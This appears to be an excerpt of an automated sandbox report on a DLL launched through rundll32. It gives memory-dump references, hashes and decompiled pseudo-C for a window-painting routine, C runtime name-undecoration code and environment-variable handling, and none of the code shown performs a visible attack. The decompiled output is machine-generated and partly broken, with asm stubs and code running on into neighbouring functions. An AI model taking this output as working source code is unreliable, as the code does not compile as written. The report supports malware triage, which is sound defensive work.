GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 10030EEA
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 10030F09

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: e652cf197484474aa77ee004c84c2ce9e9808f2ca160c0f0c27b475b69f1c72a
Instruction ID: 5d274e936d606ac0d18be7e6a8d0ab20f0ec1e67d6cbe38ebf8b77e0045353eb
Opcode Fuzzy Hash: e652cf197484474aa77ee004c84c2ce9e9808f2ca160c0f0c27b475b69f1c72a
Instruction Fuzzy Hash: 8951B171A01219AFEB02DFA5CD51AAEB3F8EF09742F010869F914EF151E771EA40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000168B, Relevance: 96.6, APIs: 54, Strings: 1, Instructions: 309
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000168B(struct HWND__* _a4) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				struct tagPAINTSTRUCT _v120;
				struct HRGN__* _v124;
				struct HDC__* _v128;
				int _v132;
				struct tagPOINT _v140;
				struct HWND__* _v144;
				struct HWND__* _v148;
				signed int _v152;
				void* _v156;
				struct HWND__* _v160;
				struct tagPOINT _v168;
				void* __ebp;
				signed int _t82;
				signed int _t97;
				long _t99;
				struct HBRUSH__* _t107;
				void* _t119;
				void* _t120;
				void* _t130;
				struct HRGN__* _t141;
				struct HRGN__* _t144;
				struct HWND__* _t152;
				int _t153;
				int _t156;
				void* _t159;
				struct HMENU__* _t160;
				struct HRGN__* _t162;
				int _t164;
				struct HRGN__* _t169;
				struct HDC__* _t170;
				void* _t171;
				struct HDC__* _t172;
				struct HDC__* _t173;
				struct HDC__* _t177;
				signed int _t178;

				_t82 =  *0x1004d054; // 0xda1f8931
				_v8 = _t82 ^ _t178;
				_t152 = _a4;
				_v156 = _t152;
				_v148 = 0;
				_v144 = 0;
				GetClientRect(_t152,  &_v24);
				_t160 = GetSubMenu(GetMenu(_t152), 1);
				_v132 = _t160;
				if((GetMenuState(_t160, 0xca, 0) & 0x00000008) == 0) {
					_v160 = 0;
					_t169 = CreateRectRgnIndirect( &_v24);
					CombineRgn(_t169, _t169,  *0x1004dbcc, 4);
					if( *0x1004dc35 != 0) {
						_v140.x = 0;
						_v140.y = 0;
						MapWindowPoints(_t152, 0,  &_v140, 1);
						OffsetRgn(_t169, _v140, _v140.y);
					}
					_t170 = GetDCEx(_t152, _t169, 0x42);
					_v128 = _t170;
					SendMessageA(_t152, 0x14, _t170, 0);
					ValidateRect(_t152, 0);
				} else {
					_v160 = 1;
					_t170 = BeginPaint(_t152,  &_v120);
					_v128 = _t170;
				}
				_v124 = SaveDC(_t170);
				_t97 = GetMenuState(_t160, 0xcd, 0) & 0x00000008;
				_v152 = _t97;
				if(_t97 != 0) {
					asm("movd xmm0, dword [ebp-0x8]");
					asm("cvtdq2pd xmm0, xmm0");
					asm("movsd");
					asm("movsd");
					asm("mulsd xmm0, [0x10042370]");
					asm("movsd");
					asm("cvttsd2si eax, xmm0");
					asm("movsd");
					asm("movd xmm0, dword [ebp-0x18]");
					asm("cvtdq2pd xmm0, xmm0");
					_v40.top = _t97;
					asm("mulsd xmm0, [0x10042380]");
					asm("cvttsd2si eax, xmm0");
					_v40.bottom = _t97;
					_t144 = CreateEllipticRgnIndirect( &_v40);
					_t177 = _v128;
					_v144 = _t144;
					SelectClipRgn(_t177, _t144);
					SetMetaRgn(_t177);
					_t160 = _v132;
				}
				_t99 = GetMenuState(_t160, 0xcc, 0) & 0x00000008;
				_v140.y = _t99;
				if(_t99 != 0) {
					asm("movd xmm0, dword [ebp-0xc]");
					asm("cvtdq2pd xmm0, xmm0");
					asm("movsd");
					asm("movsd");
					asm("mulsd xmm0, [0x10042370]");
					asm("movsd");
					asm("cvttsd2si eax, xmm0");
					asm("movsd");
					asm("movd xmm0, dword [ebp-0x2c]");
					asm("cvtdq2pd xmm0, xmm0");
					_v56.left = _t99;
					asm("mulsd xmm0, [0x10042378]");
					asm("cvttsd2si eax, xmm0");
					_v56.right = _t99;
					_t141 = CreateEllipticRgnIndirect( &_v56);
					_v148 = _t141;
					SelectClipRgn(_v128, _t141);
				}
				_t171 = CreateSolidBrush(0x8080ff);
				FillRect(_v128,  &_v24, _t171);
				DeleteObject(_t171);
				_t172 = _v128;
				RestoreDC(_t172, _v124);
				_v124 = CreateRectRgn(0, 0, 0, 0);
				_t107 = CreateSolidBrush(0xff);
				_v132 = _t107;
				if( *0x1004dc35 == 0) {
					_t162 = _v124;
				} else {
					_v168.x = 0;
					_v168.y = 0;
					MapWindowPoints(0, _t152,  &_v168, 1);
					_t162 = _v124;
					OffsetRgn(_t162, _v168, _v168.y);
					_t107 = _v132;
				}
				FrameRgn(_t172, _t162, _t107, 3, 3);
				DeleteObject(_v132);
				DeleteObject(_v124);
				_t173 = GetDC(_t152);
				if(_v152 != 0) {
					_v132 = SaveDC(_t173);
					SelectClipRgn(_t173, _v144);
					SetMetaRgn(_t173);
					_t130 = CreatePen(0, 1, 0x800080);
					_v124 = _t130;
					SelectObject(_t173, _t130);
					_t156 = _v24.top;
					if(_t156 < _v24.bottom) {
						_t153 = _t156;
						do {
							MoveToEx(_t173, 0, _t153, 0);
							LineTo(_t173, _v24.right, _t153);
							_t153 = _t153 + 0xa;
						} while (_t153 < _v24.bottom);
						_t152 = _v156;
					}
					RestoreDC(_t173, _v132);
					DeleteObject(_v124);
					DeleteObject(_v144);
				}
				if(_v140.y != 0) {
					SelectClipRgn(_t173, _v148);
					_t119 = CreatePen(0, 1, 0xff0000);
					_v156 = _t119;
					_t120 = SelectObject(_t173, _t119);
					_t164 = _v24.left;
					_v140.y = _t120;
					if(_t164 < _v24.right) {
						do {
							MoveToEx(_t173, _t164, 0, 0);
							LineTo(_t173, _t164, _v24.bottom);
							_t164 = _t164 + 0xa;
						} while (_t164 < _v24.right);
						_t120 = _v140.y;
					}
					SelectObject(_t173, _t120);
					DeleteObject(_v156);
					SelectClipRgn(_t173, 0);
					DeleteObject(_v148);
				}
				ReleaseDC(_t152, _t173);
				if(_v160 == 0) {
					ReleaseDC(_t152, _v128);
				} else {
					EndPaint(_t152,  &_v120);
				}
				return E100037EA(0, _v8 ^ _t178, _t159);
			}

APIs

GetClientRect.USER32 ref: 100016BD
GetMenu.USER32 ref: 100016C4
GetSubMenu.USER32 ref: 100016CD
GetMenuState.USER32(00000000,000000CA,00000000), ref: 100016DF
BeginPaint.USER32(?,?), ref: 100016F8
CreateRectRgnIndirect.GDI32(?), ref: 10001712
CombineRgn.GDI32(00000000,00000000,00000004), ref: 10001724
MapWindowPoints.USER32 ref: 1000174C
OffsetRgn.GDI32(00000000,?,?), ref: 1000175F
GetDCEx.USER32 ref: 10001769
SendMessageA.USER32 ref: 1000177A
ValidateRect.USER32(?,00000000), ref: 10001783
SaveDC.GDI32(00000000), ref: 1000178A
GetMenuState.USER32(00000000,000000CD,00000000), ref: 1000179B
CreateEllipticRgnIndirect.GDI32(?), ref: 100017EA
SelectClipRgn.GDI32(?,00000000), ref: 100017FB
SetMetaRgn.GDI32(?), ref: 10001802
GetMenuState.USER32(00000000,000000CC,00000000), ref: 10001813
CreateEllipticRgnIndirect.GDI32(?), ref: 10001862
SelectClipRgn.GDI32(?,00000000), ref: 10001872
CreateSolidBrush.GDI32(008080FF), ref: 10001883
FillRect.USER32(?,?,00000000), ref: 1000188F
DeleteObject.GDI32(00000000), ref: 10001896
RestoreDC.GDI32(?,?), ref: 100018A3
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100018AF
CreateSolidBrush.GDI32(000000FF), ref: 100018BD
MapWindowPoints.USER32 ref: 100018E4
OffsetRgn.GDI32(?,?,?), ref: 100018FA
FrameRgn.GDI32(?,?,00000000,00000003,00000003), ref: 1000190F
DeleteObject.GDI32(?), ref: 1000191E
DeleteObject.GDI32(?), ref: 10001923
GetDC.USER32(?), ref: 10001926
SaveDC.GDI32(00000000), ref: 10001938
SelectClipRgn.GDI32(00000000,?), ref: 10001948
SetMetaRgn.GDI32(00000000), ref: 1000194F
CreatePen.GDI32(00000000,00000001,00800080), ref: 1000195E
SelectObject.GDI32(00000000,00000000), ref: 10001969
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 1000197F
LineTo.GDI32(00000000,?,?), ref: 1000198A
RestoreDC.GDI32(00000000,?), ref: 100019A2
DeleteObject.GDI32(?), ref: 100019AB
DeleteObject.GDI32(?), ref: 100019B3
SelectClipRgn.GDI32(00000000,?), ref: 100019C9
CreatePen.GDI32(00000000,00000001,00FF0000), ref: 100019D8
SelectObject.GDI32(00000000,00000000), ref: 100019E6
MoveToEx.GDI32(00000000,?,00000000,00000000), ref: 10001A00
LineTo.GDI32(00000000,?,?), ref: 10001A0B
SelectObject.GDI32(00000000,00000000), ref: 10001A21
DeleteObject.GDI32(?), ref: 10001A33
SelectClipRgn.GDI32(00000000,00000000), ref: 10001A38
DeleteObject.GDI32(?), ref: 10001A44
ReleaseDC.USER32(?,00000000), ref: 10001A4E
EndPaint.USER32(?,?), ref: 10001A5E
ReleaseDC.USER32(?,?), ref: 10001A6A

Strings

333333?bad allocation, xrefs: 100017D7

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Object$CreateSelect$Delete$ClipMenuRect$IndirectState$BrushEllipticLineMetaMoveOffsetPaintPointsReleaseRestoreSaveSolidWindow$BeginClientCombineFillFrameMessageSendValidate
String ID: 333333?bad allocation
API String ID: 1726318560-423781954
Opcode ID: 682ad894c4e66abcb482285e08704e5de5c6abde572e8e8bafc112f18911f1dd
Instruction ID: ec48b5f3750a01a1299650892f8a478bee22796d16189536311e5406ba00b7dd
Opcode Fuzzy Hash: 682ad894c4e66abcb482285e08704e5de5c6abde572e8e8bafc112f18911f1dd
Instruction Fuzzy Hash: 1CC13C71A00228EFEB229FA0CE88B9EBBB9FF4A341F504055F605F6161DB755A41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 1000A54C, Relevance: 28.8, APIs: 19, Instructions: 339
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E1000A54C(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				char _v44;
				char _v52;
				void* __ebx;
				void* _t105;
				signed int* _t107;
				signed int _t110;
				unsigned int _t111;
				void* _t115;
				void* _t129;
				unsigned int _t134;
				void* _t142;
				void* _t148;
				intOrPtr* _t149;
				intOrPtr* _t152;
				unsigned int _t154;
				signed char _t156;
				void* _t162;
				intOrPtr* _t163;
				signed int _t165;
				signed int _t169;
				void* _t172;
				signed int* _t174;
				signed int _t181;
				signed int _t185;
				void* _t189;
				intOrPtr* _t190;
				void* _t191;
				signed int _t195;
				unsigned int _t205;
				void* _t235;
				signed int _t253;
				signed int _t257;
				intOrPtr* _t260;
				intOrPtr* _t261;
				void* _t262;
				void* _t263;

				_t198 =  *0x1004e004; // 0x0
				_t263 = _t262 - 0x30;
				_t105 =  *_t198;
				if(_t105 == 0) {
					L50:
					E10007662(_t198, _a4, 1, _a8);
					L51:
					_t107 = _a4;
					L52:
					return _t107;
				}
				if(_t105 < 0x36 || _t105 > 0x39) {
					if(_t105 != 0x5f) {
						goto L49;
					}
					goto L4;
				} else {
					L4:
					_t195 = _t105 - 0x36;
					_t198 = _t198 + 1;
					 *0x1004e004 = _t198;
					if(_t195 != 0x29) {
						__eflags = _t195;
						if(_t195 < 0) {
							L49:
							_t107 = _a4;
							_t107[1] = _t107[1] & 0x00000000;
							 *_t107 =  *_t107 & 0x00000000;
							_t107[1] = 2;
							goto L52;
						}
						_t253 = _t198;
						__eflags = _t195 - 3;
						if(__eflags > 0) {
							goto L49;
						}
						L11:
						if(_t195 == 0xffffffff) {
							goto L49;
						}
						_t260 = _a8;
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_v12 =  *_t260;
						_v8 =  *((intOrPtr*)(_t260 + 4));
						_t110 = 2;
						_t257 = _t195 & _t110;
						if(_t257 == 0) {
							L23:
							if((_t195 & 0x00000004) != 0) {
								_t154 =  *0x1004e00c; // 0x0
								_t156 =  !(_t154 >> 1);
								_t282 = _t156 & 0x00000001;
								_push( &_v52);
								if((_t156 & 0x00000001) == 0) {
									E1000792E( &_v12, E10008C87(_t253, __eflags));
								} else {
									_t162 = E10007637(_t198,  &_v44, 0x20, E10008C87(_t253, _t282));
									_t263 = _t263 + 0x10;
									_t163 = E100076A6(_t162,  &_v28,  &_v12);
									_v12 =  *_t163;
									_v8 =  *((intOrPtr*)(_t163 + 4));
								}
							}
							_t111 =  *0x1004e00c; // 0x0
							_push( &_v52);
							if(( !(_t111 >> 1) & 0x00000001) == 0) {
								_t115 = E10009326();
								_t200 =  &_v12;
								E1000792E( &_v12, _t115);
							} else {
								_t152 = E100076A6(E10009326(),  &_v44,  &_v12);
								_t200 =  *_t152;
								_v12 =  *_t152;
								_v8 =  *((intOrPtr*)(_t152 + 4));
							}
							if( *_t260 != 0) {
								_t148 = E10007637(_t200,  &_v52, 0x28,  &_v12);
								_t263 = _t263 + 0xc;
								_t149 = E100076C8(_t148,  &_v44, 0x29);
								_v12 =  *_t149;
								_v8 =  *((intOrPtr*)(_t149 + 4));
							}
							_t261 = E1000A9CF(0x1004e020, 8);
							if(_t261 == 0) {
								_t261 = 0;
							} else {
								 *_t261 = 0;
								 *((intOrPtr*)(_t261 + 4)) = 0;
							}
							E1000B7CC(0,  &_v36, _t261);
							E100077A0( &_v12, E100076C8(E10007637(0x1004e020,  &_v44, 0x28, E1000892F( &_v52)),  &_v28, 0x29));
							_t205 =  *0x1004e00c; // 0x0
							if((_t205 & 0x00000060) != 0x60 && _t257 != 0) {
								E100077A0( &_v12,  &_v20);
								_t205 =  *0x1004e00c; // 0x0
							}
							_push( &_v52);
							if(( !(_t205 >> 0x13) & 0x00000001) == 0) {
								_t129 = E1000B6A3(_t253);
								_t209 =  &_v12;
								E1000792E( &_v12, _t129);
							} else {
								_t142 = E1000B6A3(_t253);
								_t209 =  &_v12;
								E100077A0( &_v12, _t142);
							}
							E100077A0( &_v12, E1000AA59(_t209,  &_v52));
							_t134 =  *0x1004e00c; // 0x0
							_push( &_v52);
							if(( !(_t134 >> 8) & 0x00000001) == 0) {
								E1000792E( &_v12, E1000C728());
							} else {
								E100077A0( &_v12, E1000C728());
							}
							_t107 = _a4;
							if(_t261 == 0) {
								_t107[1] = 0;
								_t107[1] = 3;
								 *_t107 = 0;
							} else {
								 *_t261 = _v12;
								 *((intOrPtr*)(_t261 + 4)) = _v8;
								 *_t107 = _v36;
								_t107[1] = _v32;
							}
							goto L52;
						}
						if( *_t198 == 0x40) {
							_t33 = _t253 + 1; // 0x2
							_t165 = _t33;
							 *0x1004e004 = _t165;
							L19:
							_t235 =  *_t165;
							if(_t235 == 0) {
								E100076A6(E100072DE( &_v52, 1), _a4,  &_v12);
								goto L51;
							}
							if(_t235 != 0x40) {
								goto L49;
							}
							 *0x1004e004 = _t165 + 1;
							_t169 =  *0x1004e00c; // 0x0
							_push( &_v52);
							if((_t169 & 0x00000060) == 0x60) {
								_t172 = E1000C6F9();
								_t198 =  &_v20;
								E1000792E( &_v20, _t172);
							} else {
								_t174 = E1000C6F9();
								_t198 =  *_t174;
								_v20 =  *_t174;
								_v16 = _t174[1];
							}
							goto L23;
						}
						_v24 = _t110;
						_v28 = "::";
						_t244 = E1000723E( &_v44,  &_v28);
						E100076A6(_t177,  &_v28,  &_v12);
						_v12 = _v28;
						_v8 = _v24;
						_t181 =  *0x1004e004; // 0x0
						if( *_t181 == 0) {
							E100076A6(E100072DE( &_v52, 1),  &_v28,  &_v12);
							_v12 = _v28;
							_t185 = _v24;
						} else {
							_t189 = E10007637(_t244,  &_v28, 0x20, E1000B7FB(_t253,  &_v44));
							_t263 = _t263 + 0x10;
							_t190 = E100076A6(_t189,  &_v52,  &_v12);
							_t185 =  *(_t190 + 4);
							_v12 =  *_t190;
						}
						_v8 = _t185;
						_t165 =  *0x1004e004; // 0x0
						goto L19;
					}
					_t191 =  *_t198;
					if(_t191 == 0) {
						goto L50;
					} else {
						_t1 = _t198 + 1; // 0x2
						_t253 = _t1;
						_t195 = _t191 - 0x3d;
						_t198 = _t253;
						 *0x1004e004 = _t198;
						if(_t195 < 4 || _t195 > 7) {
							_t195 = _t195 | 0xffffffff;
						}
						goto L11;
					}
				}
			}

APIs

DName::operator+.LIBCMT ref: 1000A619
DName::operator+.LIBCMT ref: 1000A656
DName::DName.LIBVCRUNTIME ref: 1000A66A
DName::operator+.LIBCMT ref: 1000A679
DName::operator+.LIBCMT ref: 1000A707
DName::operator|=.LIBCMT ref: 1000A723
DName::DName.LIBVCRUNTIME ref: 1000A72F
DName::operator+.LIBCMT ref: 1000A73D
DName::operator+.LIBCMT ref: 1000A777
DName::operator+.LIBCMT ref: 1000A7B8
UnDecorator::getReturnType.LIBCMT ref: 1000A7E8
operator+.LIBVCRUNTIME ref: 1000A8F5

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
String ID:
API String ID: 1186856153-0
Opcode ID: 9a4858990016edd865b9f5722faa12f8155521a7dd883606db600d808f10d677
Instruction ID: baac971f02029b1684e9aa9550a20a3cdcf8536d5ea312e8ad83acfebace1a35
Opcode Fuzzy Hash: 9a4858990016edd865b9f5722faa12f8155521a7dd883606db600d808f10d677
Instruction Fuzzy Hash: B7C1C175D04208AFEB04CFA4C895EEE7BF8FF09380F104159E50AA7285EF35AA85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10028E03, Relevance: 24.4, APIs: 16, Instructions: 411
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10028E03(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v0;
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v48;
				signed int _v100;
				signed int _v136;
				signed int _t116;
				signed int _t119;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t128;
				signed int _t129;
				signed int _t133;
				signed int _t135;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				void* _t147;
				signed int _t152;
				signed int* _t154;
				signed int* _t160;
				signed int _t166;
				signed int _t169;
				void* _t170;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t182;
				intOrPtr* _t191;
				signed int _t196;
				signed int _t203;
				intOrPtr* _t210;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t237;
				signed int _t238;
				void* _t239;
				void* _t241;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				signed int _t267;
				signed int _t270;
				signed int _t272;
				signed int _t274;
				signed int _t281;
				signed int _t282;
				void* _t283;
				signed int _t284;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				WCHAR* _t302;
				signed int _t303;
				signed int _t304;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t316;
				void* _t317;
				void* _t319;
				void* _t320;
				void* _t322;
				void* _t324;

				_t222 = __ebx;
				_t308 = _t316;
				_t317 = _t316 - 0x10;
				_t295 = _a4;
				_t326 = _t295;
				if(_t295 != 0) {
					_push(__ebx);
					_t286 = _t295;
					_t116 = E10041B10(_t295, 0x3d);
					_v20 = _t116;
					__eflags = _t116;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t116 - _t295;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t116 + 1));
							L120();
							_t222 = 0;
							__eflags =  *0x1004e384 - _t222; // 0x3ab448
							if(__eflags != 0) {
								L14:
								_t121 =  *0x1004e384; // 0x3ab448
								_v12 = _t121;
								__eflags = _t121;
								if(_t121 == 0) {
									goto L39;
								} else {
									_t124 = E10029436(_t295, _v20 - _t295);
									_v16 = _t124;
									_t237 = _v12;
									__eflags = _t124;
									if(_t124 < 0) {
										L24:
										__eflags = _v5 - _t222;
										if(_v5 == _t222) {
											goto L40;
										} else {
											_t125 =  ~_t124;
											_v16 = _t125;
											_t30 = _t125 + 2; // 0x2
											_t282 = _t30;
											__eflags = _t282 - _t125;
											if(_t282 < _t125) {
												goto L39;
											} else {
												__eflags = _t282 - 0x3fffffff;
												if(_t282 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E10029699(_t237, _t282, 4);
													E100268B3(_t222);
													_t128 = _v12;
													_t317 = _t317 + 0x10;
													__eflags = _t128;
													if(_t128 == 0) {
														goto L39;
													} else {
														_t238 = _v16;
														_t286 = _t222;
														 *(_t128 + _t238 * 4) = _t295;
														 *(_t128 + 4 + _t238 * 4) = _t222;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t237 - _t222;
										if( *_t237 == _t222) {
											goto L24;
										} else {
											E100268B3( *((intOrPtr*)(_t237 + _t124 * 4)));
											_t281 = _v16;
											__eflags = _v5 - _t222;
											if(_v5 != _t222) {
												_t286 = _t222;
												 *(_v12 + _t281 * 4) = _t295;
											} else {
												_t282 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t282 + _t281 * 4)) - _t222;
													if( *((intOrPtr*)(_t282 + _t281 * 4)) == _t222) {
														break;
													}
													 *((intOrPtr*)(_t282 + _t281 * 4)) =  *((intOrPtr*)(_t282 + 4 + _t281 * 4));
													_t281 = _t281 + 1;
													__eflags = _t281;
												}
												_v16 = E10029699(_t282, _t281, 4);
												E100268B3(_t222);
												_t128 = _v16;
												_t317 = _t317 + 0x10;
												__eflags = _t128;
												if(_t128 != 0) {
													L29:
													 *0x1004e384 = _t128;
												}
											}
											__eflags = _a8 - _t222;
											if(_a8 == _t222) {
												goto L40;
											} else {
												_t239 = _t295 + 1;
												do {
													_t129 =  *_t295;
													_t295 = _t295 + 1;
													__eflags = _t129;
												} while (_t129 != 0);
												_v16 = _t295 - _t239 + 2;
												_t298 = E10026850(_t295 - _t239 + 2, 1);
												_pop(_t241);
												__eflags = _t298;
												if(_t298 == 0) {
													L37:
													E100268B3(_t298);
													goto L40;
												} else {
													_t133 = E100120A5(_t298, _v16, _a4);
													_t319 = _t317 + 0xc;
													__eflags = _t133;
													if(__eflags != 0) {
														_push(_t222);
														_push(_t222);
														_push(_t222);
														_push(_t222);
														_push(_t222);
														E1000E341();
														asm("int3");
														_push(_t308);
														_t310 = _t319;
														_t320 = _t319 - 0x10;
														_push(_t222);
														_t225 = _v48;
														__eflags = _t225;
														if(__eflags != 0) {
															_push(_t298);
															_push(_t286);
															_push(0x3d);
															_push(_t225);
															_t288 = _t225;
															_t135 = E10041C3B(_t241);
															_v20 = _t135;
															__eflags = _t135;
															if(__eflags == 0) {
																L81:
																 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
																goto L82;
															} else {
																__eflags = _t135 - _t225;
																if(__eflags == 0) {
																	goto L81;
																} else {
																	_t139 =  *(_t135 + 2) & 0x0000ffff;
																	_v24 = _t139;
																	_v16 = _t139;
																	E1002941C();
																	_t300 =  *0x1004e388; // 0x0
																	_t226 = 0;
																	__eflags = _t300;
																	if(_t300 != 0) {
																		L59:
																		_v20 = _v20 - _t288 >> 1;
																		_t142 = E1002948B(_t288, _v20 - _t288 >> 1);
																		_v12 = _t142;
																		__eflags = _t142;
																		if(_t142 < 0) {
																			L67:
																			__eflags = _v16 - _t226;
																			if(_v16 == _t226) {
																				goto L83;
																			} else {
																				_t143 =  ~_t142;
																				_v12 = _t143;
																				_t75 = _t143 + 2; // 0x2
																				_t252 = _t75;
																				__eflags = _t252 - _t143;
																				if(_t252 < _t143) {
																					goto L82;
																				} else {
																					__eflags = _t252 - 0x3fffffff;
																					if(_t252 >= 0x3fffffff) {
																						goto L82;
																					} else {
																						_t301 = E10029699(_t300, _t252, 4);
																						E100268B3(_t226);
																						_t320 = _t320 + 0x10;
																						__eflags = _t301;
																						if(_t301 == 0) {
																							goto L82;
																						} else {
																							_t253 = _v12;
																							_t288 = _t226;
																							_t146 = _v0;
																							 *(_t301 + _t253 * 4) = _t146;
																							 *(_t301 + 4 + _t253 * 4) = _t226;
																							goto L72;
																						}
																					}
																				}
																			}
																		} else {
																			__eflags =  *_t300 - _t226;
																			if( *_t300 == _t226) {
																				goto L67;
																			} else {
																				E100268B3( *((intOrPtr*)(_t300 + _t142 * 4)));
																				_t274 = _v12;
																				__eflags = _v16 - _t226;
																				if(_v16 == _t226) {
																					while(1) {
																						__eflags =  *(_t300 + _t274 * 4) - _t226;
																						if( *(_t300 + _t274 * 4) == _t226) {
																							break;
																						}
																						 *(_t300 + _t274 * 4) =  *(_t300 + 4 + _t274 * 4);
																						_t274 = _t274 + 1;
																						__eflags = _t274;
																					}
																					_t301 = E10029699(_t300, _t274, 4);
																					E100268B3(_t226);
																					_t320 = _t320 + 0x10;
																					_t146 = _t288;
																					__eflags = _t301;
																					if(_t301 != 0) {
																						L72:
																						 *0x1004e388 = _t301;
																					}
																				} else {
																					_t146 = _v0;
																					_t288 = _t226;
																					 *(_t300 + _t274 * 4) = _t146;
																				}
																				__eflags = _a4 - _t226;
																				if(_a4 == _t226) {
																					goto L83;
																				} else {
																					_t254 = _t146;
																					_t84 = _t254 + 2; // 0x2
																					_t283 = _t84;
																					do {
																						_t147 =  *_t254;
																						_t254 = _t254 + 2;
																						__eflags = _t147 - _t226;
																					} while (_t147 != _t226);
																					_t85 = (_t254 - _t283 >> 1) + 2; // 0x0
																					_v16 = _t85;
																					_t302 = E10026850(_t85, 2);
																					_pop(_t258);
																					__eflags = _t302;
																					if(_t302 == 0) {
																						L80:
																						E100268B3(_t302);
																						goto L83;
																					} else {
																						_t152 = E10028A30(_t302, _v16, _v0);
																						_t322 = _t320 + 0xc;
																						__eflags = _t152;
																						if(_t152 != 0) {
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							E1000E341();
																							asm("int3");
																							_push(_t310);
																							_t312 = _t322;
																							_push(_t288);
																							_t290 = _v100;
																							__eflags = _t290;
																							if(_t290 != 0) {
																								_t260 = 0;
																								_t154 = _t290;
																								__eflags =  *_t290;
																								if( *_t290 != 0) {
																									do {
																										_t154 =  &(_t154[1]);
																										_t260 = _t260 + 1;
																										__eflags =  *_t154;
																									} while ( *_t154 != 0);
																								}
																								_t96 = _t260 + 1; // 0x2
																								_t303 = E10026850(_t96, 4);
																								_t262 = _t302;
																								__eflags = _t303;
																								if(_t303 == 0) {
																									L101:
																									E10012120(_t226, _t262, _t283, _t303);
																									goto L102;
																								} else {
																									_t270 =  *_t290;
																									__eflags = _t270;
																									if(_t270 == 0) {
																										L100:
																										E100268B3(0);
																										_t177 = _t303;
																										goto L88;
																									} else {
																										_push(_t226);
																										_t226 = _t303 - _t290;
																										__eflags = _t226;
																										do {
																											_t97 = _t270 + 1; // 0x5
																											_t283 = _t97;
																											do {
																												_t178 =  *_t270;
																												_t270 = _t270 + 1;
																												__eflags = _t178;
																											} while (_t178 != 0);
																											_t262 = _t270 - _t283;
																											_t98 = _t262 + 1; // 0x6
																											_v16 = _t98;
																											 *(_t226 + _t290) = E10026850(_t98, 1);
																											E100268B3(0);
																											_t322 = _t322 + 0xc;
																											__eflags =  *(_t226 + _t290);
																											if( *(_t226 + _t290) == 0) {
																												goto L101;
																											} else {
																												_t182 = E100120A5( *(_t226 + _t290), _v16,  *_t290);
																												_t322 = _t322 + 0xc;
																												__eflags = _t182;
																												if(_t182 != 0) {
																													L102:
																													_push(0);
																													_push(0);
																													_push(0);
																													_push(0);
																													_push(0);
																													E1000E341();
																													asm("int3");
																													_push(_t312);
																													_push(_t262);
																													_push(_t262);
																													_push(_t290);
																													_t291 = _v136;
																													__eflags = _t291;
